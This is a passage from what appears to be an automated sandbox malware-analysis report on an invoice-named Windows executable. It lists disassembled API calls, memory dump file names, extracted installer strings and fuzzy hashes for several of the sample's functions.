                                                                                                                                                                                                                            • Part of subcall function 00405CB8: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F99,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CC8
                                                                                                                                                                                                                            • Part of subcall function 00405CB8: lstrlenA.KERNEL32(00000000,?,00000000,00405F99,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CFA
                                                                                                                                                                                                                          • GetShortPathNameW.KERNEL32(004275C8,004275C8,00000400), ref: 00405F06
                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 00405F24
                                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,00000004,004275C8,?,?,?,?,?), ref: 00405F5F
                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F6E
                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA6
                                                                                                                                                                                                                          • SetFilePointer.KERNEL32(0040A588,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A588,00000000,[Rename],00000000,00000000,00000000), ref: 00405FFC
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 0040600D
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406014
                                                                                                                                                                                                                            • Part of subcall function 00405D53: GetFileAttributesW.KERNELBASE(00000003,00402E84,C:\Users\user\Desktop\FACTURA A-7507_H1758.exe,80000000,00000003), ref: 00405D57
                                                                                                                                                                                                                            • Part of subcall function 00405D53: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405D79
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                                                                                                                                                                          • String ID: %ls=%ls$NUL$[Rename]
                                                                                                                                                                                                                          • API String ID: 222337774-899692902
                                                                                                                                                                                                                          • Opcode ID: b79c81f05b1b833d126071e3cf8f1dbc038624686787cc5f02dad872694d8803
                                                                                                                                                                                                                          • Instruction ID: 52ae09e4e2a5e81e4d5588e003ad531eff1fe7f7ae6e2de5146a23cae23f7ad9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b79c81f05b1b833d126071e3cf8f1dbc038624686787cc5f02dad872694d8803
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EB315330241B19BBD2206B209D08F2B3A5CEF85758F15043BF942F62C2EA7CC9118EBD
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CharNextW.USER32(?,*?|<>/":,00000000,00000000,77233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FACTURA A-7507_H1758.exe",00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 00406475
                                                                                                                                                                                                                          • CharNextW.USER32(?,?,?,00000000), ref: 00406484
                                                                                                                                                                                                                          • CharNextW.USER32(?,00000000,77233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FACTURA A-7507_H1758.exe",00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 00406489
                                                                                                                                                                                                                          • CharPrevW.USER32(?,?,77233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FACTURA A-7507_H1758.exe",00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 0040649C
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • *?|<>/":, xrefs: 00406464
                                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00406413
                                                                                                                                                                                                                          • "C:\Users\user\Desktop\FACTURA A-7507_H1758.exe", xrefs: 00406412
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Char$Next$Prev
                                                                                                                                                                                                                          • String ID: "C:\Users\user\Desktop\FACTURA A-7507_H1758.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                          • API String ID: 589700163-490790066
                                                                                                                                                                                                                          • Opcode ID: 3235da6fa7aa45e9bf0ecdfd9fa5d30a804d535f67a6192059b6605710e04147
                                                                                                                                                                                                                          • Instruction ID: c1b46f2de1f90aebbf911330ce555e940da56993e608f70b6a8db31027969b8c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3235da6fa7aa45e9bf0ecdfd9fa5d30a804d535f67a6192059b6605710e04147
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5311C85680121299DB307B588C40AB7A2B8EF55754F52803FEDCA732C1E77C5C9286BD
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000EB), ref: 004042C6
                                                                                                                                                                                                                          • GetSysColor.USER32(00000000), ref: 004042E2
                                                                                                                                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 004042EE
                                                                                                                                                                                                                          • SetBkMode.GDI32(?,?), ref: 004042FA
                                                                                                                                                                                                                          • GetSysColor.USER32(?), ref: 0040430D
                                                                                                                                                                                                                          • SetBkColor.GDI32(?,?), ref: 0040431D
                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00404337
                                                                                                                                                                                                                          • CreateBrushIndirect.GDI32(?), ref: 00404341
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2320649405-0
                                                                                                                                                                                                                          • Opcode ID: c443cadc41ebc586ff1270cf4c3a90a0d5c0685d314312a93ad56e7471fbb8ef
                                                                                                                                                                                                                          • Instruction ID: 2a82f640caf94e13ad52f77eccc7f6a005bf570db5d4005cc44859485eb84fad
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c443cadc41ebc586ff1270cf4c3a90a0d5c0685d314312a93ad56e7471fbb8ef
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9F215171600704ABCB219F68DE08B4BBBF8AF81714F04892DED95E26A0D738E904CB64
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 00405315
                                                                                                                                                                                                                          • lstrlenW.KERNEL32(00402E19,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 00405325
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(00422708,00402E19,00402E19,00422708,00000000,00000000,00000000), ref: 00405338
                                                                                                                                                                                                                          • SetWindowTextW.USER32(00422708,00422708), ref: 0040534A
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405370
                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538A
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405398
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2531174081-0
                                                                                                                                                                                                                          • Opcode ID: e0d278b4f454602652d1392a5fb3045d02927be56822f9b38c604404e895085a
                                                                                                                                                                                                                          • Instruction ID: d14990956ab1253184f877e9e8298894284f42a30aea32824f5004b5108fa95f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e0d278b4f454602652d1392a5fb3045d02927be56822f9b38c604404e895085a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 62217F71900518BACF119FA6DD44ACFBFB8EF85354F10807AF904B62A1C7B94A51DFA8
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • DestroyWindow.USER32(00000000,00000000), ref: 00402DBA
                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00402DD8
                                                                                                                                                                                                                          • wsprintfW.USER32 ref: 00402E06
                                                                                                                                                                                                                            • Part of subcall function 004052DD: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 00405315
                                                                                                                                                                                                                            • Part of subcall function 004052DD: lstrlenW.KERNEL32(00402E19,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 00405325
                                                                                                                                                                                                                            • Part of subcall function 004052DD: lstrcatW.KERNEL32(00422708,00402E19,00402E19,00422708,00000000,00000000,00000000), ref: 00405338
                                                                                                                                                                                                                            • Part of subcall function 004052DD: SetWindowTextW.USER32(00422708,00422708), ref: 0040534A
                                                                                                                                                                                                                            • Part of subcall function 004052DD: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405370
                                                                                                                                                                                                                            • Part of subcall function 004052DD: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538A
                                                                                                                                                                                                                            • Part of subcall function 004052DD: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405398
                                                                                                                                                                                                                          • CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402E2A
                                                                                                                                                                                                                          • ShowWindow.USER32(00000000,00000005), ref: 00402E38
                                                                                                                                                                                                                            • Part of subcall function 00402D83: MulDiv.KERNEL32(00000000,00000064,0000046D), ref: 00402D98
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                                                                                                                                          • String ID: ... %d%%
                                                                                                                                                                                                                          • API String ID: 722711167-2449383134
                                                                                                                                                                                                                          • Opcode ID: 8ee64202bb889ad073ab03690c1da717cfa73e4708a38b32ca01aecf011a85b8
                                                                                                                                                                                                                          • Instruction ID: 67f39cb704aca6262626a7976268bb3bb8a333bdab68892006d91dd8afb4411f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8ee64202bb889ad073ab03690c1da717cfa73e4708a38b32ca01aecf011a85b8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 96016D70541614EBC721AB60EF4DA9B7A68AF00706B14417FF885F12E0CBF85865CBEE
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404BC2
                                                                                                                                                                                                                          • GetMessagePos.USER32 ref: 00404BCA
                                                                                                                                                                                                                          • ScreenToClient.USER32(?,?), ref: 00404BE4
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404BF6
                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C1C
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                                          • String ID: f
                                                                                                                                                                                                                          • API String ID: 41195575-1993550816
                                                                                                                                                                                                                          • Opcode ID: 0086211f2de0e1ca33d279ef662edcfa4b2f35d2ca496e99dd6aa4820b9c6f7a
                                                                                                                                                                                                                          • Instruction ID: 45e0f6331f39cfe7836e80c9775163861a3897288b26a0b158bc224782e9bc0b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0086211f2de0e1ca33d279ef662edcfa4b2f35d2ca496e99dd6aa4820b9c6f7a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C9015271901218BAEB00DB94DD45FFEBBBCAF54711F10012BBA51B61D0C7B495018B54
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402D22
                                                                                                                                                                                                                          • wsprintfW.USER32 ref: 00402D56
                                                                                                                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 00402D66
                                                                                                                                                                                                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D78
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                                          • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                                                                                                                                          • API String ID: 1451636040-1158693248
                                                                                                                                                                                                                          • Opcode ID: f920e2d473a8442ab140d7cb001c2dea54e1cd42605ecc10fb631262ba466dce
                                                                                                                                                                                                                          • Instruction ID: 006a23aec332b8a1771af90dfa9c1e08c84c5b856183a3bf167901723993fe13
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f920e2d473a8442ab140d7cb001c2dea54e1cd42605ecc10fb631262ba466dce
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2FF0367050020CABEF206F50DD49BEA3B69FF44305F00803AFA55B51D0DBF959558F59
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 10002416
                                                                                                                                                                                                                            • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040), ref: 10002397
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26345910476.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26345861444.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26345958604.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26346002793.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4216380887-0
                                                                                                                                                                                                                          • Opcode ID: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                                                                                                                                                                                          • Instruction ID: a8798eece1b67337def5fc6f06e905ed3cc6fca3e5836deafc22007a072d802d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A14190B1508305EFF320DF24D885AAA77F8FB883D0F50452DF9468619ADB34AA54DB61
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 10002572
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 100025AD
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26345910476.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26345861444.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26345958604.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26346002793.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Global$Free$Alloc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1780285237-0
                                                                                                                                                                                                                          • Opcode ID: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                                                                                                                                                                                          • Instruction ID: 76257f5bf6759f365bfcd452de7d39bb0b2322773c3eba187a8a795e141f7608
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6831DE71504A21EFF321CF14CCA8E2B7BF8FB853D2F114529FA40961A8CB319851DB69
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 004028E9
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 004028FC
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00402914
                                                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                                                                                          • String ID:
